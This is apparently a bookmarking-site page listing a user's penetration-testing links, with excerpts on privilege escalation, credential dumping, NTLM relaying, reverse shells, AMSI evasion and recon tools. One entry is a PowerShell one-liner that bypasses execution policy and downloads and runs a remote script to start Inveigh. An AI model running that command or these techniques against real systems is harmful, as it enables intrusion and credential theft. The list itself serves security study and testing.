recentpopularlog in

whip_lash : pentest   407

« earlier  
Rotten Potato | Penetration Testing Lab
However there is a technique which can be used that tries to trick the “NT Authority\System” account to negotiate and authenticate via NTLM locally so the token for the “NT Authority\System” account would become available and therefore privilege escalation possible. This technique is called Rotten Potato and it was introduced in DerbyCon 2016 by Stephen Breen and Chris Mallz.
windows  privesc  privilegeescalation  pentest  security 
yesterday by whip_lash
GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking Tool
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.
oracle  database  pentest  security  tool 
yesterday by whip_lash
GitHub - ZerBea/hcxdumptool: Small tool to capture packets from wlan devices.
Favorite tweet:

hcxdumptool : Small tool to capture packets from wlan devices :

— Binni Shah (@binitamshah) August 11, 2018
wifi  pentest 
7 days ago by whip_lash
infodox/python-pty-shells: Python PTY backdoors - full PTY or nothing!
The following is a collection of bind and reverse shells which give you a fully working PTY.

This is far superior to a normal bind or reverse shell, as you have job control and an interactive PTY and can do such things as use nano/vi to write files, su to elevate privs/change user, and ssh onward. You can also CTRL+C and suchlike.
pentest  reverseshell  tty 
13 days ago by whip_lash
JSON Web Tokens -
JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties.

JWT.IO allows you to decode, verify and generate JWT.
authentication  javascript  json  security  webapp  pentest 
15 days ago by whip_lash
GitHub - pentestmonkey/pysecdump: Python-based tool to dump security information from Windows systems
pysecdump is a python tool to extract various credentials and secrets from running Windows systems. It currently extracts:

LM and NT hashes (SYSKEY protected)
Cached domain passwords
LSA secrets
Secrets from Credential Manager (only some)
pentest  security  tool 
17 days ago by whip_lash
maK-/parameth: This tool can be used to brute discover GET and POST parameters
This tool can be used to brute discover GET and POST parameters

Often when you are busting a directory for common files, you can identify scripts (for example test.php) that look like they need to be passed an unknown parameter. This hopefully can help find them.
pentest  webapp 
18 days ago by whip_lash
danielmiessler/RobotsDisallowed: A harvest of the Disallowed directories from the robots.txt files of the world's top websites.
The RobotsDisallowed project is a harvest of the Disallowed directories from the robots.txt files of the world's top websites--specifically the Alexa 100K.

This list of Disallowed directories is a great way to supplement content discovery during a web security assessment, since the website owner is basically saying "Don't go here; there's sensitive stuff in there!".
pentest  webapp  wordlist  gobuster 
18 days ago by whip_lash
GerbenJavado/LinkFinder: A python script that finds endpoints in JavaScript files
LinkFinder is a python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing. Resulting in new testing ground, possibility containing new vulnerabilities.
javascript  pentest  webapp 
18 days ago by whip_lash
There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies, but we need to stay update on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of version with known vulnerabilities.
javascript  security  pentest  webapp 
18 days ago by whip_lash
GitHub - s0md3v/Photon: Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target.

160 requests per second while extensive data extraction is just another day for Photon!
python  security  tools  web  recon  pentest 
18 days ago by whip_lash
x90skysn3k/brutespray: Brute-Forcing from Nmap output - Automatically attempts default creds on found services.
BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.
bruteforce  defaultcreds  pentest 
19 days ago by whip_lash
vysec/DomLink: A tool to link a domain with registered organisation names and emails, to other domains.
DomLink is a tool that uses a domain name to discover organisation name and associated e-mail address to then find further associated domains.

This is useful for bug bounty and red team engagements where you need to discover more domains associated with the target.
recon  dns  pentest 
19 days ago by whip_lash
presidentbeef/brakeman: A static analysis security vulnerability scanner for Ruby on Rails applications
Brakeman is a static analysis tool which checks Ruby on Rails applications for security vulnerabilities.
rails  ruby  analysis  git  recon  pentest 
19 days ago by whip_lash
PyCQA/bandit: Bandit is a tool designed to find common security issues in Python code.
Bandit is a tool designed to find common security issues in Python code. To do this Bandit processes each file, builds an AST from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report.
git  recon  pentest  python  analysis 
19 days ago by whip_lash
appsecco/bugcrowd-levelup-subdomain-enumeration: This repository contains all the material from the talk "Esoteric sub-domain enumeration techniques" given at Bugcrowd LevelUp 2017 virtual conference
cheatsheet.pdf - cheat sheet on the sub-domain enumeration techniques covered in the talk - A script to do DNS enumeration using Cloudflare service - Extract sub-domains for a given domain using postgres interface
esoteric_subdomain_enumeration_techniques.pdf - Slides from the talk - Extract sub-domains for a given domain using API - Extract sub-domains for a given domain using RSS feed
subdomain_wordlist.txt - A collection of sub-domain names(around 3 million)
dns  recon  enumeration  pentest 
19 days ago by whip_lash
Love letters from the red team: from e-mail to NTLM hashes with Microsoft Outlook
Even though all it takes to exploit the issue is the ability to send an HTML e-mail, meaning it is possible to use any e-mail client or even a script to automate this attack, in this section we will describe how to achieve this using Microsoft Outlook itself.
responder  outlook  hash  email  pentest 
20 days ago by whip_lash
Bring Your Own Land (BYOL) – A Novel Red Teaming Technique « Bring Your Own Land (BYOL) – A Novel Red Teaming Technique | FireEye Inc
In this blog post, I will discuss an alternative to current LotL techniques. With the most current build of Cobalt Strike (version 3.11), it is now possible to execute .NET assemblies entirely within memory by using the “execute-assembly” command. By developing custom C#-based assemblies, attackers no longer need to rely on the tools present on the target system; they can instead write and deliver their own tools, a technique I call Bring Your Own Land (BYOL).
cobaltstrike  byol  c#  pentest 
21 days ago by whip_lash
Web Application Penetration Testing Tool: Tracy
Tracy is a pentesting tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner. tracy should be used during the mapping-the-application phase of the pentest to identify sources of input and their corresponding outputs. tracy can use this data to intelligently find vulnerable instances of XSS, especially with web applications that use lots of JavaScript.
webapp  pentest  xss 
21 days ago by whip_lash
exploitexcel.png (1272×694)
Which privesc exploits work on which Windows versions
Windows  exploits  pentest  privesc  privilegeescalation 
21 days ago by whip_lash
LFISuite/pathtotest.txt at master · D35m0nd142/LFISuite
Useful files to retrieve from a Linux system if you have an LFI or XXE.
lfi  xxe  pentest 
27 days ago by whip_lash
swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I <3 pull requests :)
hacking  security  webapp  payloads  pentest 
27 days ago by whip_lash
The PowerView PowerUsage Series #1 – harmj0y
PowerView is probably my favorite bit of code I’ve written, and definitely the one I most regularly use (as evidenced by my recent posts). My team also heavily utilizes the toolkit, and we’ve come up with some cool uses for it over the past several years. For a long time I’ve wanted to share some of the real “power” uses of PowerView, like the PowerView “tricks” highlighted here.
powerview  pentest  powershell 
4 weeks ago by whip_lash
Invoke-PowerThIEf/ at master · nettitude/Invoke-PowerThIEf
Automatically scan any windows or tabs for login forms and then record what gets posted. A notification will appear when some have arrived.
ie  powershell  pentest  postexploitation 
4 weeks ago by whip_lash
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
hacking  pentest  security 
4 weeks ago by whip_lash
SANS Penetration Testing | Pen Test Poster: "White Board" - Bash - Useful IPv6 Pivot | SANS Institute
Pv6 brings a lot of changes, many of which are relevant from a security perspective. It also brings with it unique potential for added vulnerable space that can be leveraged in network compromises. IPv6 is not well understood and prone to misconfiguration. During security assessments, I've seen these settings result in critical security vulnerabilities including a firewall configured to provide carte blanche access to the entire network for all traffic using IPv6. Operating in IPv6 and taking advantage of these weaknesses is a key opportunity for pentesters.
ipv6  pentest  security 
5 weeks ago by whip_lash
Update to ProxyCannon — #_shellntel
We've cleaned up the number of arguments required to run the app from 6 to 3.  Now you only need to specify the AMI KEY, AMI ID, and the number instances you'd like start.
proxycannon  pentest 
6 weeks ago by whip_lash
Hexacorn | Blog
If you run ‘powershell <0x2000 spaces> calc’ you will spawn Windows Calculator.

What will you see in the logs?


obfuscation  logging  pentest  windows  security 
7 weeks ago by whip_lash
Bypassing SQL Server Logon Trigger Restrictions
Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I’ll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties.
database  pentest  security  mssql  MySQL  sql 
7 weeks ago by whip_lash
SANS Penetration Testing | Modern Web Application Penetration Testing Part 1, XSS and XSRF Together | SANS Institute
Now the code. The important parts are getting the script to run, we used a body onload. The script runs each one of the forms. The forms each contain one of the XSRF attacks. Each form loads in a different iframe. The first one runs, then the second one waits from the iframe onload to fire before it runs, and so on. Victim logs in, they check their queue, the XSS runs, the XSRF runs, they have lost control of the application, attacker win, or in this case a very effective demonstration of risk.
xss  csrf  xsrf  webapp  pentest 
7 weeks ago by whip_lash
Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random >
This article is going to be talking about what you can do with Net-NTLM in modern windows environments.
hash  ntlm  relay  windows  pentest  security 
7 weeks ago by whip_lash
SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute
But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you in my blog post about using a Python version of psexec at It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET!
impacket  python  security  smb  relay  ntlm  hash  script  pentest 
7 weeks ago by whip_lash
calebmadrigal/trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.
network  python  security  wifi  wireless  pentest  github 
7 weeks ago by whip_lash
sense-of-security/ADRecon: ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis.
security  pentest  activedirectory  github 
7 weeks ago by whip_lash
SANS Penetration Testing | Modern Web Application Penetration Testing Part 2, Hash Length Extension Attacks | SANS Institute
Favorite tweet:

SANS | #PenTest Blog

Modern Web App Pen Testing Part 2, Hash Length Extension Attacks
by @adriendb (SEC642)


— SANS Pen Test (@SANSPenTest) June 28, 2018
hashextension  hash  webapp  pentest  security 
7 weeks ago by whip_lash
Microsoft COM for Windows - Privilege Escalation
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
privesc  windows  pentest  exploit  security 
7 weeks ago by whip_lash
Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses | McAfee Blogs
In this post, we highlighted one approach and application of the ATT&CK model. There are many ways to apply it for red teaming, threat hunting, and other tasks. At McAfee we embrace the model and are applying it to different levels and purposes in our organization. We are not only using it but also contribute to the model by describing newly discovered techniques used by adversaries.
pentest  security 
8 weeks ago by whip_lash
Mimikatz 2.0 - Golden Ticket Walkthrough - Projects - Beneath the Waves
The "executive summary" version of a Golden Ticket is that if you can obtain one of the encryption keys used by the krbtgt account for an Active Directory domain, Mimikatz 2.0 will allow you to forge arbitrary Kerberos authentication tickets for that domain. Those keys are not easily-obtained — unless someone has left an NTDS.DIT backup lying around, it probably requires access to a domain admin account's credentials — so the Golden Ticket functionality is sort of like the "New Game+" mode in the Silent Hill series: you've already won, and now you can play through again as an unstoppable juggernaut with a laser pistol and/or chainsaw.
activedirectory  mimikatz  goldenticket  pentest  security 
8 weeks ago by whip_lash
Exploring PowerShell AMSI and Logging Evasion – MDSec
Before attempting to load a script, it has now become commonplace to run the following AMSI bypass:
But have you ever wondered just how this magic command goes about unhooking AMSI?
In this post, we will walk through just how this technique works under the hood, then we will look at a few alternate ways to unhook AMSI from PowerShell.
amsi  powershell  pentest 
8 weeks ago by whip_lash
One-Lin3r v1.1 - Gives You One-Liners That Aids In Penetration Testing Operations - KitPloit - PenTest Tools for your Security Arsenal ☣
Favorite tweet:

#OneLin3r v1.1 - Gives You One-Liners That Aids In Penetration #Testing Operations

— ☣ The Hacker Tools (@KitPloit) June 14, 2018
pentest  security  tool 
8 weeks ago by whip_lash
« earlier      
per page:    204080120160

Copy this bookmark:

to read